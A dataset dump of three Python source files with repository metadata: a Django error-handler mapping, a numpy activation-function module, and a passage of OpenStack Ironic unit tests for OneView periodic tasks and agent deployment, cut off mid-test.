| 141
|
py
|
Python
|
devilry/project/common/http_error_handlers.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 29
|
2015-01-18T22:56:23.000Z
|
2020-11-10T21:28:27.000Z
|
devilry/project/common/http_error_handlers.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 786
|
2015-01-06T16:10:18.000Z
|
2022-03-16T11:10:50.000Z
|
devilry/project/common/http_error_handlers.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 15
|
2015-04-06T06:18:43.000Z
|
2021-02-24T12:28:30.000Z
|
# Django-convention module-level error-handler hooks: the URLconf machinery
# looks these names up to route HTTP 404 and 500 responses to devilry's
# custom error views instead of the framework defaults.
handler404 = 'devilry.devilry_errortemplates.views.custom_404_handler'
handler500 = 'devilry.devilry_errortemplates.views.custom_500_handler'
| 70.5
| 70
| 0.879433
| 16
| 141
| 7.375
| 0.5625
| 0.237288
| 0.474576
| 0.559322
| 0.661017
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 0.035461
| 141
| 2
| 71
| 70.5
| 0.779412
| 0
| 0
| 0
| 0
| 0
| 0.774648
| 0.774648
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db62351278c9a45ad5a2e829f0a11da9b4944222
| 3,295
|
py
|
Python
|
glosysnet/nn/activate/activate.py
|
NareshAtnPLUS/glosysnet
|
e85df44727b8784766be7e728267e5699997e226
|
[
"MIT"
] | null | null | null |
glosysnet/nn/activate/activate.py
|
NareshAtnPLUS/glosysnet
|
e85df44727b8784766be7e728267e5699997e226
|
[
"MIT"
] | null | null | null |
glosysnet/nn/activate/activate.py
|
NareshAtnPLUS/glosysnet
|
e85df44727b8784766be7e728267e5699997e226
|
[
"MIT"
] | null | null | null |
import numpy as np
def sigmoid(x, derivative=False):
    """Logistic sigmoid activation 1 / (1 + e^-x).

    With ``derivative=True`` the value ``x * (1 - x)`` is returned, the
    usual backprop shortcut that assumes *x* already holds sigmoid
    outputs -- NOTE(review): confirm callers pass activations here,
    not raw pre-activations.
    """
    if not derivative:
        return 1 / (1 + np.exp(-x))
    return x * (1 - x)
def tanh(x, derivative=False):
    """Hyperbolic tangent activation.

    Unlike ``sigmoid``, the derivative branch recomputes tanh from the
    raw input, returning 1 - tanh(x)**2.
    """
    if not derivative:
        return np.tanh(x)
    return 1 - np.square(np.tanh(x))
def relu(x, derivative=False):
    """Rectified linear unit, applied elementwise *in place* on a 2-D x.

    Forward pass clamps non-positive entries to 0 and leaves positive
    ones untouched; the derivative branch writes the ReLU gradient
    (1 where the entry is positive, else 0).  The container passed in
    is mutated and also returned.
    """
    if derivative:
        for row in x:
            for k, value in enumerate(row):
                row[k] = 1 if value > 0 else 0
        return x
    for row in x:
        for k, value in enumerate(row):
            # `not (value > 0)` (rather than `value <= 0`) mirrors the
            # original else-branch, including its treatment of NaN.
            if not (value > 0):
                row[k] = 0
    return x
def arctan(x, derivative=False):
    """Arctangent activation.

    Bug fix: the derivative of arctan(x) is 1 / (1 + x**2).  The previous
    implementation returned ``np.cos(x) ** 2``, which only equals the true
    derivative when fed ``arctan(x)`` rather than the raw input ``x``
    (cos(arctan(x))**2 == 1/(1+x**2)); for the raw input it was wrong,
    e.g. at x=1 it gave cos(1)**2 ~= 0.29 instead of 0.5.
    """
    if derivative:
        return 1 / (1 + np.square(x))
    return np.arctan(x)
def step(x, derivative=False):
    """Heaviside step activation, applied elementwise *in place* on 2-D x.

    Forward: 1 for positive entries, 0 otherwise.  The step function is
    flat (almost) everywhere, so its backprop gradient is 0 for every
    entry.

    Bug fix: the old derivative branch zeroed only positive entries and
    left non-positive inputs untouched, leaking raw input values into
    the gradient.  All entries are now zeroed.  The container passed in
    is mutated and also returned.
    """
    if derivative:
        for row in x:
            for k in range(len(row)):
                row[k] = 0
        return x
    for row in x:
        for k in range(len(row)):
            row[k] = 1 if row[k] > 0 else 0
    return x
def squash(x, derivative=False):
    """Softsign-style squashing v / (1 + |v|), elementwise in place on 2-D x.

    NOTE(review): the derivative branch computes v / (1 + |v|) again
    (split by sign: v/(1+v) for v>0, v/(1-v) otherwise) rather than the
    analytic 1 / (1 + |v|)**2 -- confirm this is intentional before
    relying on it for backprop.  The container is mutated and returned.
    """
    if derivative:
        for row in x:
            for k, v in enumerate(row):
                denom = 1 + v if v > 0 else 1 - v
                row[k] = v / denom
        return x
    for row in x:
        for k, v in enumerate(row):
            row[k] = v / (1 + abs(v))
    return x
def gaussian(x, derivative=False):
    """Gaussian activation exp(-v**2), applied elementwise in place on 2-D x.

    Derivative: -2 * v * exp(-v**2).

    Bug fix: the derivative branch previously had no ``return``, so it
    fell through into the forward-pass loops and overwrote every
    just-computed gradient g with exp(-g**2).  It now returns the
    gradient immediately.  The container is mutated and also returned.
    """
    if derivative:
        for row in x:
            for k in range(len(row)):
                row[k] = -2 * row[k] * np.exp(-row[k] ** 2)
        return x
    for row in x:
        for k in range(len(row)):
            row[k] = np.exp(-row[k] ** 2)
    return x
def leaky_relu(x, derivative=False):
    """Leaky ReLU with fixed negative slope alpha=0.1, in place on 2-D x.

    The guard ``v >= alpha * v`` is mathematically equivalent to
    ``v >= 0`` for 0 < alpha < 1; it is kept verbatim to preserve the
    original behaviour exactly.  Forward: v on the non-negative side,
    alpha * v on the negative side.  Derivative: 1 vs. alpha.
    The container is mutated and also returned.
    """
    alpha = 0.1
    if derivative:
        for row in x:
            for k, v in enumerate(row):
                row[k] = 1 if v >= alpha * v else alpha
        return x
    for row in x:
        for k, v in enumerate(row):
            if not (v >= alpha * v):
                row[k] = alpha * v
    return x
def elu(x, derivative=False):
    """Exponential linear unit with alpha=0.1, elementwise in place on 2-D x.

    Forward: v for v > 0, alpha * (exp(v) - 1) otherwise.
    Derivative: 1 for v > 0, alpha * exp(v) otherwise.
    The container is mutated and also returned.
    """
    alpha = 0.1
    if derivative:
        for row in x:
            for k, v in enumerate(row):
                row[k] = 1 if v > 0 else alpha * np.exp(v)
        return x
    for row in x:
        for k, v in enumerate(row):
            if not (v > 0):
                row[k] = alpha * (np.exp(v) - 1)
    return x
| 30.229358
| 83
| 0.427618
| 527
| 3,295
| 2.671727
| 0.087287
| 0.073864
| 0.085227
| 0.15625
| 0.839489
| 0.839489
| 0.800426
| 0.714489
| 0.704545
| 0.678267
| 0
| 0.026007
| 0.404856
| 3,295
| 109
| 84
| 30.229358
| 0.691994
| 0.073141
| 0
| 0.747475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0.030303
| 0.010101
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db9098f2b064b71de95efeb1e67b324c9678fe4d
| 44,034
|
py
|
Python
|
ironic/tests/unit/drivers/modules/oneview/test_deploy.py
|
mail2nsrajesh/ironic
|
ff4be0cd4044a634a8ad04ad50bc97fa625b3305
|
[
"Apache-2.0"
] | null | null | null |
ironic/tests/unit/drivers/modules/oneview/test_deploy.py
|
mail2nsrajesh/ironic
|
ff4be0cd4044a634a8ad04ad50bc97fa625b3305
|
[
"Apache-2.0"
] | null | null | null |
ironic/tests/unit/drivers/modules/oneview/test_deploy.py
|
mail2nsrajesh/ironic
|
ff4be0cd4044a634a8ad04ad50bc97fa625b3305
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Hewlett Packard Enterprise Development LP.
# Copyright 2016 Universidade Federal de Campina Grande
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import time
import types
from oslo_utils import importutils
from ironic.common import driver_factory
from ironic.common import exception
from ironic.common import states
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.conf import CONF
from ironic.drivers.modules import agent
from ironic.drivers.modules import agent_client
from ironic.drivers.modules import iscsi_deploy
from ironic.drivers.modules.oneview import common
from ironic.drivers.modules.oneview import deploy
from ironic.drivers.modules.oneview import deploy_utils
from ironic.drivers.modules.oneview import power
from ironic.drivers.modules import pxe
from ironic.drivers import utils as driver_utils
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as obj_utils
# oneview_client is an optional dependency: try_import returns the module
# when importable, else None (tests below construct its ServerHardware).
oneview_models = importutils.try_import('oneview_client.models')
# The only conductor-manager methods the MagicMock in these tests may expose.
METHODS = ['iter_nodes', 'update_node', 'do_provisioning_action']
PXE_DRV_INFO_DICT = db_utils.get_test_pxe_driver_info()
PXE_INST_INFO_DICT = db_utils.get_test_pxe_instance_info()
oneview_error = common.SERVER_HARDWARE_ALLOCATION_ERROR
maintenance_reason = common.NODE_IN_USE_BY_ONEVIEW
driver_internal_info = {'oneview_error': oneview_error}
# Canned iter_nodes() results: (node_id, driver[, extra]) tuples fed to the
# periodic-task checks in OneViewPeriodicTasks below.
nodes_taken_by_oneview = [(1, 'fake_oneview')]
nodes_freed_by_oneview = [(1, 'fake_oneview', maintenance_reason)]
nodes_taken_on_cleanfail = [(1, 'fake_oneview', driver_internal_info)]
nodes_taken_on_cleanfail_no_info = [(1, 'fake_oneview', {})]
# Matches the agent group's post_deploy_get_power_state_retries config below.
GET_POWER_STATE_RETRIES = 5
def _setup_node_in_available_state(node):
    """Force *node* into AVAILABLE with maintenance cleared, and persist."""
    node.maintenance = False
    node.maintenance_reason = None
    node.provision_state = states.AVAILABLE
    node.save()
def _setup_node_in_manageable_state(node):
    """Force *node* into MANAGEABLE, in maintenance because OneView holds
    the server hardware, and persist."""
    node.maintenance = True
    node.maintenance_reason = common.NODE_IN_USE_BY_ONEVIEW
    node.provision_state = states.MANAGEABLE
    node.save()
def _setup_node_in_cleanfailed_state_with_oneview_error(node):
    """Force *node* into CLEANFAIL, recording a OneView allocation error
    under driver_internal_info['oneview_error'], and persist."""
    node.provision_state = states.CLEANFAIL
    node.maintenance = False
    node.maintenance_reason = None
    # Read, mutate, then re-assign the whole dict -- presumably so the
    # object layer notices the field changed; confirm against Node.
    info = node.driver_internal_info
    info['oneview_error'] = common.SERVER_HARDWARE_ALLOCATION_ERROR
    node.driver_internal_info = info
    node.save()
def _setup_node_in_cleanfailed_state_without_oneview_error(node):
    """Force *node* into CLEANFAIL with no OneView error recorded."""
    node.maintenance = False
    node.maintenance_reason = None
    node.provision_state = states.CLEANFAIL
    node.save()
class OneViewDriverDeploy(deploy.OneViewPeriodicTasks):
    """Concrete OneViewPeriodicTasks used as the system under test: the
    real OneView client is replaced by a MagicMock."""
    oneview_driver = 'fake_oneview'

    def __init__(self):
        self.oneview_client = mock.MagicMock()
@mock.patch('ironic.objects.Node', spec_set=True, autospec=True)
@mock.patch.object(deploy_utils, 'is_node_in_use_by_oneview')
class OneViewPeriodicTasks(db_base.DbTestCase):
    """Tests for the OneViewPeriodicTasks periodic checks.

    The two class decorators inject two mocks into every test method
    (innermost patch first): ``mock_is_node_in_use_by_oneview`` and
    ``mock_node_get`` (the patched ironic.objects.Node).
    """

    def setUp(self):
        super(OneViewPeriodicTasks, self).setUp()
        # Minimal oneview config so the fake driver loads.
        self.config(manager_url='https://1.2.3.4', group='oneview')
        self.config(username='user', group='oneview')
        self.config(password='password', group='oneview')
        mgr_utils.mock_the_extension_manager(driver='fake_oneview')
        self.driver = driver_factory.get_driver('fake_oneview')
        self.deploy = OneViewDriverDeploy()
        # spec=METHODS restricts the conductor-manager mock to the three
        # methods the periodic tasks may call.
        self.manager = mock.MagicMock(spec=METHODS)
        self.node = obj_utils.create_test_node(
            self.context, driver='fake_oneview',
            properties=db_utils.get_test_oneview_properties(),
            driver_info=db_utils.get_test_oneview_driver_info(),
        )

    def test_node_manageable_maintenance_when_in_use_by_oneview(
        self, mock_is_node_in_use_by_oneview, mock_node_get
    ):
        """An AVAILABLE node found in use by OneView is moved into
        maintenance (manage action) with the in-use reason set."""
        mock_node_get.get.return_value = self.node
        _setup_node_in_available_state(self.node)
        self.manager.iter_nodes.return_value = nodes_taken_by_oneview
        mock_is_node_in_use_by_oneview.return_value = True
        self.deploy._periodic_check_nodes_taken_by_oneview(
            self.manager, self.context
        )
        mock_is_node_in_use_by_oneview.assert_called_once_with(
            self.deploy.oneview_client, self.node
        )
        self.assertTrue(self.manager.update_node.called)
        self.assertTrue(self.manager.do_provisioning_action.called)
        self.assertTrue(self.node.maintenance)
        self.assertEqual(common.NODE_IN_USE_BY_ONEVIEW,
                         self.node.maintenance_reason)

    def test_node_stay_available_when_not_in_use_by_oneview(
        self, mock_is_node_in_use_by_oneview, mock_node_get
    ):
        """An AVAILABLE node not in use by OneView is left untouched."""
        mock_node_get.get.return_value = self.node
        _setup_node_in_available_state(self.node)
        mock_node_get.return_value = self.node
        mock_is_node_in_use_by_oneview.return_value = False
        self.manager.iter_nodes.return_value = nodes_taken_by_oneview
        self.deploy._periodic_check_nodes_taken_by_oneview(
            self.manager, self.context
        )
        mock_is_node_in_use_by_oneview.assert_called_once_with(
            self.deploy.oneview_client, self.node
        )
        self.assertFalse(self.manager.update_node.called)
        self.assertFalse(self.manager.do_provisioning_action.called)
        self.assertFalse(self.node.maintenance)
        self.assertIsNone(self.node.maintenance_reason)

    def test_node_stay_available_when_raise_exception(
        self, mock_is_node_in_use_by_oneview, mock_node_get
    ):
        """A OneViewError during the check must not change the node."""
        mock_node_get.get.return_value = self.node
        _setup_node_in_available_state(self.node)
        side_effect = exception.OneViewError('boom')
        mock_is_node_in_use_by_oneview.side_effect = side_effect
        self.manager.iter_nodes.return_value = nodes_taken_by_oneview
        self.deploy._periodic_check_nodes_taken_by_oneview(
            self.manager, self.context
        )
        mock_is_node_in_use_by_oneview.assert_called_once_with(
            self.deploy.oneview_client, self.node
        )
        self.assertFalse(self.manager.update_node.called)
        self.assertFalse(self.manager.do_provisioning_action.called)
        self.assertFalse(self.node.maintenance)
        self.assertNotEqual(common.NODE_IN_USE_BY_ONEVIEW,
                            self.node.maintenance_reason)

    def test_node_available_when_not_in_use_by_oneview(
        self, mock_is_node_in_use_by_oneview, mock_node_get
    ):
        """A MANAGEABLE node freed by OneView is taken out of maintenance
        and provided back to ironic."""
        mock_node_get.get.return_value = self.node
        _setup_node_in_manageable_state(self.node)
        self.manager.iter_nodes.return_value = nodes_freed_by_oneview
        mock_is_node_in_use_by_oneview.return_value = False
        self.deploy._periodic_check_nodes_freed_by_oneview(
            self.manager, self.context
        )
        mock_is_node_in_use_by_oneview.assert_called_once_with(
            self.deploy.oneview_client, self.node
        )
        self.assertTrue(self.manager.update_node.called)
        self.assertTrue(self.manager.do_provisioning_action.called)
        self.assertFalse(self.node.maintenance)
        self.assertIsNone(self.node.maintenance_reason)

    def test_node_stay_manageable_when_in_use_by_oneview(
        self, mock_is_node_in_use_by_oneview, mock_node_get
    ):
        """A MANAGEABLE node still in use by OneView stays in maintenance."""
        mock_node_get.get.return_value = self.node
        _setup_node_in_manageable_state(self.node)
        mock_is_node_in_use_by_oneview.return_value = True
        self.manager.iter_nodes.return_value = nodes_freed_by_oneview
        self.deploy._periodic_check_nodes_freed_by_oneview(
            self.manager, self.context
        )
        mock_is_node_in_use_by_oneview.assert_called_once_with(
            self.deploy.oneview_client, self.node
        )
        self.assertFalse(self.manager.update_node.called)
        self.assertFalse(self.manager.do_provisioning_action.called)
        self.assertTrue(self.node.maintenance)
        self.assertEqual(common.NODE_IN_USE_BY_ONEVIEW,
                         self.node.maintenance_reason)

    def test_node_stay_manageable_maintenance_when_raise_exception(
        self, mock_is_node_in_use_by_oneview, mock_node_get
    ):
        """A OneViewError during the freed-nodes check must leave the
        node in maintenance, untouched."""
        mock_node_get.get.return_value = self.node
        _setup_node_in_manageable_state(self.node)
        side_effect = exception.OneViewError('boom')
        mock_is_node_in_use_by_oneview.side_effect = side_effect
        self.manager.iter_nodes.return_value = nodes_freed_by_oneview
        self.deploy._periodic_check_nodes_freed_by_oneview(
            self.manager, self.context
        )
        mock_is_node_in_use_by_oneview.assert_called_once_with(
            self.deploy.oneview_client, self.node
        )
        self.assertFalse(self.manager.update_node.called)
        self.assertFalse(self.manager.do_provisioning_action.called)
        self.assertTrue(self.node.maintenance)
        self.assertEqual(common.NODE_IN_USE_BY_ONEVIEW,
                         self.node.maintenance_reason)

    def test_node_manageable_maintenance_when_oneview_error(
        self, mock_is_node_in_use_by_oneview, mock_node_get
    ):
        """A CLEANFAIL node with a recorded oneview_error is moved to
        manageable/maintenance and the error flag is cleared."""
        mock_node_get.get.return_value = self.node
        _setup_node_in_cleanfailed_state_with_oneview_error(self.node)
        self.manager.iter_nodes.return_value = nodes_taken_on_cleanfail
        self.deploy._periodic_check_nodes_taken_on_cleanfail(
            self.manager, self.context
        )
        self.assertTrue(self.manager.update_node.called)
        self.assertTrue(self.manager.do_provisioning_action.called)
        self.assertTrue(self.node.maintenance)
        self.assertEqual(common.NODE_IN_USE_BY_ONEVIEW,
                         self.node.maintenance_reason)
        self.assertFalse('oneview_error' in self.node.driver_internal_info)

    def test_node_stay_clean_failed_when_no_oneview_error(
        self, mock_is_node_in_use_by_oneview, mock_node_get
    ):
        """A CLEANFAIL node without a oneview_error flag is left alone."""
        mock_node_get.get.return_value = self.node
        _setup_node_in_cleanfailed_state_without_oneview_error(self.node)
        self.manager.iter_nodes.return_value = nodes_taken_on_cleanfail_no_info
        self.deploy._periodic_check_nodes_taken_on_cleanfail(
            self.manager, self.context
        )
        self.assertFalse(self.manager.update_node.called)
        self.assertFalse(self.manager.do_provisioning_action.called)
        self.assertFalse(self.node.maintenance)
        self.assertNotEqual(common.NODE_IN_USE_BY_ONEVIEW,
                            self.node.maintenance_reason)
        self.assertFalse('oneview_error' in self.node.driver_internal_info)
@mock.patch.object(common, 'get_oneview_client', spec_set=True, autospec=True)
class TestOneViewAgentDeploy(db_base.DbTestCase):
    """Tests for the agent_pxe_oneview deploy interface.

    The class decorator injects ``mock_get_ov_client`` (a patched
    common.get_oneview_client) as the last mock argument of every test.
    Methods that patch ``time.sleep`` to a no-op do so because the
    power-off wait loop retries GET_POWER_STATE_RETRIES times.
    """

    def setUp(self):
        super(TestOneViewAgentDeploy, self).setUp()
        self.config(
            post_deploy_get_power_state_retries=GET_POWER_STATE_RETRIES,
            group='agent')
        mgr_utils.mock_the_extension_manager(driver="agent_pxe_oneview")
        self.driver = driver_factory.get_driver("agent_pxe_oneview")
        self.node = obj_utils.create_test_node(
            self.context, driver='agent_pxe_oneview',
            properties=db_utils.get_test_oneview_properties(),
            driver_info=db_utils.get_test_oneview_driver_info(),
            driver_internal_info={'agent_url': 'http://1.2.3.4:5678'},
        )

    @mock.patch.object(time, 'sleep', lambda seconds: None)
    @mock.patch.object(manager_utils, 'node_power_action', autospec=True)
    @mock.patch.object(power.OneViewPower, 'get_power_state',
                       spec=types.FunctionType)
    @mock.patch.object(agent_client.AgentClient, 'power_off',
                       spec=types.FunctionType)
    @mock.patch('ironic.conductor.utils.node_set_boot_device', autospec=True)
    def test_reboot_and_finish_deploy(self, set_bootdev_mock, power_off_mock,
                                      get_power_state_mock,
                                      node_power_action_mock,
                                      mock_get_ov_client):
        """Happy path: soft power-off completes on the second poll, boot
        device is set to disk, and the node ends up ACTIVE."""
        self.node.provision_state = states.DEPLOYING
        self.node.target_provision_state = states.ACTIVE
        self.node.save()
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            # First poll still ON, second poll OFF -> exactly two polls.
            get_power_state_mock.side_effect = [states.POWER_ON,
                                                states.POWER_OFF]
            task.driver.deploy.reboot_and_finish_deploy(task)
            power_off_mock.assert_called_once_with(task.node)
            self.assertEqual(2, get_power_state_mock.call_count)
            set_bootdev_mock.assert_called_once_with(task, 'disk',
                                                     persistent=True)
            node_power_action_mock.assert_called_once_with(
                task, states.POWER_ON)
            self.assertEqual(states.ACTIVE, task.node.provision_state)
            self.assertEqual(states.NOSTATE, task.node.target_provision_state)

    @mock.patch.object(time, 'sleep', lambda seconds: None)
    @mock.patch.object(manager_utils, 'node_power_action', autospec=True)
    @mock.patch.object(power.OneViewPower, 'get_power_state',
                       spec=types.FunctionType)
    @mock.patch.object(agent_client.AgentClient, 'power_off',
                       spec=types.FunctionType)
    def test_reboot_and_finish_deploy_soft_poweroff_doesnt_complete(
            self, power_off_mock, get_power_state_mock,
            node_power_action_mock, mock_get_ov_client):
        """If the node never reports POWER_OFF, a hard power-off is
        issued after GET_POWER_STATE_RETRIES + 1 polls."""
        oneview_client = mock_get_ov_client.return_value
        self.driver.management.oneview_client = oneview_client
        fake_server_hardware = oneview_models.ServerHardware()
        fake_server_hardware.server_profile_uri = 'any/applied_sp_uri/'
        oneview_client.get_server_hardware_by_uuid.return_value = (
            fake_server_hardware
        )
        mock_get_ov_client.return_value = oneview_client
        self.node.provision_state = states.DEPLOYING
        self.node.target_provision_state = states.ACTIVE
        driver_info = self.node.driver_info
        driver_info['applied_server_profile_uri'] = 'any/applied_sp_uri/'
        self.node.driver_info = driver_info
        self.node.save()
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            get_power_state_mock.return_value = states.POWER_ON
            task.driver.deploy.reboot_and_finish_deploy(task)
            power_off_mock.assert_called_once_with(task.node)
            self.assertEqual(GET_POWER_STATE_RETRIES + 1,
                             get_power_state_mock.call_count)
            node_power_action_mock.assert_has_calls([
                mock.call(task, states.POWER_OFF),
                mock.call(task, states.POWER_ON)
            ])
            self.assertEqual(states.ACTIVE, task.node.provision_state)
            self.assertEqual(states.NOSTATE, task.node.target_provision_state)

    @mock.patch.object(manager_utils, 'node_power_action', autospec=True)
    @mock.patch.object(agent_client.AgentClient, 'power_off',
                       spec=types.FunctionType)
    def test_reboot_and_finish_deploy_soft_poweroff_fails(
            self, power_off_mock, node_power_action_mock,
            mock_get_ov_client):
        """A failing agent power_off falls back to a hard power cycle and
        the deployment still completes."""
        oneview_client = mock_get_ov_client.return_value
        self.driver.management.oneview_client = oneview_client
        fake_server_hardware = oneview_models.ServerHardware()
        fake_server_hardware.server_profile_uri = 'any/applied_sp_uri/'
        oneview_client.get_server_hardware_by_uuid.return_value = (
            fake_server_hardware
        )
        mock_get_ov_client.return_value = oneview_client
        power_off_mock.side_effect = RuntimeError("boom")
        self.node.provision_state = states.DEPLOYING
        self.node.target_provision_state = states.ACTIVE
        driver_info = self.node.driver_info
        driver_info['applied_server_profile_uri'] = 'any/applied_sp_uri/'
        self.node.driver_info = driver_info
        self.node.save()
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            task.driver.deploy.reboot_and_finish_deploy(task)
            power_off_mock.assert_called_once_with(task.node)
            node_power_action_mock.assert_has_calls([
                mock.call(task, states.POWER_OFF),
                mock.call(task, states.POWER_ON)
            ])
            self.assertEqual(states.ACTIVE, task.node.provision_state)
            self.assertEqual(states.NOSTATE, task.node.target_provision_state)

    @mock.patch.object(time, 'sleep', lambda seconds: None)
    @mock.patch.object(manager_utils, 'node_power_action', autospec=True)
    @mock.patch.object(power.OneViewPower, 'get_power_state',
                       spec=types.FunctionType)
    @mock.patch.object(agent_client.AgentClient, 'power_off',
                       spec=types.FunctionType)
    def test_reboot_and_finish_deploy_get_power_state_fails(
            self, power_off_mock, get_power_state_mock,
            node_power_action_mock, mock_get_ov_client):
        """Power-state polling errors are retried, then a hard power
        cycle completes the deployment anyway."""
        oneview_client = mock_get_ov_client.return_value
        self.driver.management.oneview_client = oneview_client
        fake_server_hardware = oneview_models.ServerHardware()
        fake_server_hardware.server_profile_uri = 'any/applied_sp_uri/'
        oneview_client.get_server_hardware_by_uuid.return_value = (
            fake_server_hardware
        )
        mock_get_ov_client.return_value = oneview_client
        self.node.provision_state = states.DEPLOYING
        self.node.target_provision_state = states.ACTIVE
        driver_info = self.node.driver_info
        driver_info['applied_server_profile_uri'] = 'any/applied_sp_uri/'
        self.node.driver_info = driver_info
        self.node.save()
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            get_power_state_mock.side_effect = RuntimeError("boom")
            task.driver.deploy.reboot_and_finish_deploy(task)
            power_off_mock.assert_called_once_with(task.node)
            self.assertEqual(GET_POWER_STATE_RETRIES + 1,
                             get_power_state_mock.call_count)
            node_power_action_mock.assert_has_calls([
                mock.call(task, states.POWER_OFF),
                mock.call(task, states.POWER_ON)
            ])
            self.assertEqual(states.ACTIVE, task.node.provision_state)
            self.assertEqual(states.NOSTATE, task.node.target_provision_state)

    @mock.patch.object(driver_utils, 'collect_ramdisk_logs', autospec=True)
    @mock.patch.object(time, 'sleep', lambda seconds: None)
    @mock.patch.object(manager_utils, 'node_power_action', autospec=True)
    @mock.patch.object(power.OneViewPower, 'get_power_state',
                       spec=types.FunctionType)
    @mock.patch.object(agent_client.AgentClient, 'power_off',
                       spec=types.FunctionType)
    def test_reboot_and_finish_deploy_power_action_fails(
            self, power_off_mock, get_power_state_mock,
            node_power_action_mock, collect_ramdisk_logs_mock,
            mock_get_ov_client):
        """A failing power action raises InstanceDeployFailure, moves the
        node to DEPLOYFAIL and collects the ramdisk logs."""
        self.node.provision_state = states.DEPLOYING
        self.node.target_provision_state = states.ACTIVE
        self.node.save()
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            get_power_state_mock.return_value = states.POWER_ON
            node_power_action_mock.side_effect = RuntimeError("boom")
            self.assertRaises(exception.InstanceDeployFailure,
                              task.driver.deploy.reboot_and_finish_deploy,
                              task)
            power_off_mock.assert_called_once_with(task.node)
            self.assertEqual(GET_POWER_STATE_RETRIES + 1,
                             get_power_state_mock.call_count)
            node_power_action_mock.assert_has_calls([
                mock.call(task, states.POWER_OFF),
                mock.call(task, states.POWER_OFF)])
            self.assertEqual(states.DEPLOYFAIL, task.node.provision_state)
            self.assertEqual(states.ACTIVE, task.node.target_provision_state)
            collect_ramdisk_logs_mock.assert_called_once_with(task.node)

    @mock.patch.object(manager_utils, 'node_power_action', autospec=True)
    @mock.patch.object(power.OneViewPower, 'get_power_state',
                       spec=types.FunctionType)
    @mock.patch.object(agent_client.AgentClient, 'power_off',
                       spec=types.FunctionType)
    @mock.patch('ironic.drivers.modules.agent.AgentDeploy'
                '.check_deploy_success', autospec=True)
    @mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
    def test_reboot_to_instance(self, clean_pxe_mock, check_deploy_mock,
                                power_off_mock, get_power_state_mock,
                                node_power_action_mock, mock_get_ov_client):
        """reboot_to_instance cleans up the PXE ramdisk, powers the node
        on and moves it to ACTIVE."""
        check_deploy_mock.return_value = None
        oneview_client = mock_get_ov_client.return_value
        self.driver.management.oneview_client = oneview_client
        fake_server_hardware = oneview_models.ServerHardware()
        fake_server_hardware.server_profile_uri = 'any/applied_sp_uri/'
        oneview_client.get_server_hardware_by_uuid.return_value = (
            fake_server_hardware
        )
        mock_get_ov_client.return_value = oneview_client
        self.node.provision_state = states.DEPLOYWAIT
        self.node.target_provision_state = states.ACTIVE
        driver_info = self.node.driver_info
        driver_info['applied_server_profile_uri'] = 'any/applied_sp_uri/'
        self.node.driver_info = driver_info
        self.node.save()
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            get_power_state_mock.return_value = states.POWER_OFF
            task.node.driver_internal_info['is_whole_disk_image'] = True
            task.driver.deploy.reboot_to_instance(task)
            clean_pxe_mock.assert_called_once_with(task.driver.boot, task)
            check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
            power_off_mock.assert_called_once_with(task.node)
            get_power_state_mock.assert_called_once_with(task)
            node_power_action_mock.assert_called_once_with(
                task, states.POWER_ON)
            self.assertEqual(states.ACTIVE, task.node.provision_state)
            self.assertEqual(states.NOSTATE, task.node.target_provision_state)

    @mock.patch.object(manager_utils, 'node_power_action', autospec=True)
    @mock.patch.object(power.OneViewPower, 'get_power_state',
                       spec=types.FunctionType)
    @mock.patch.object(agent_client.AgentClient, 'power_off',
                       spec=types.FunctionType)
    @mock.patch('ironic.drivers.modules.agent.AgentDeploy'
                '.check_deploy_success', autospec=True)
    @mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
    def test_reboot_to_instance_boot_none(self, clean_pxe_mock,
                                          check_deploy_mock,
                                          power_off_mock,
                                          get_power_state_mock,
                                          node_power_action_mock,
                                          mock_get_ov_client):
        """With no boot interface, ramdisk cleanup is skipped but the
        deployment still completes to ACTIVE."""
        oneview_client = mock_get_ov_client.return_value
        self.driver.management.oneview_client = oneview_client
        fake_server_hardware = oneview_models.ServerHardware()
        fake_server_hardware.server_profile_uri = 'any/applied_sp_uri/'
        oneview_client.get_server_hardware_by_uuid.return_value = (
            fake_server_hardware
        )
